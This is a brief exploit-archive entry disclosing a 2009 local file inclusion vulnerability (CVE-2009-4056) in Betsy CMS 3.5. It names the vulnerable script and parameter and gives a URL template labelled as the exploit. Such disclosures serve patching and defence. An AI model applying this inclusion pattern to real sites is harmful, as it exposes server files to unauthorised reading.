Betsy CMS versions 3.5 - Local File Inclusion
| EKU-ID: 17790 | CVE: CVE-2009-4056;OSVDB-60467 | OSVDB-ID: |
| Author: MizoZ | Published: 2009-11-21 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 17790 | CVE: CVE-2009-4056;OSVDB-60467 | OSVDB-ID: |
| Author: MizoZ | Published: 2009-11-21 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
/* Author : MizoZ [from MA] Group : EvilWay Email : mizozx[at]gmail[dot]com Greetz : Zuka !! Good luck DZ :) */ The vulnerability is in the file admin/popup.php on the get $_GET['popup'] Exploit : [HOST]/[PATH]/admin/popup.php?popup=[IT INCLUDE FROM admin/]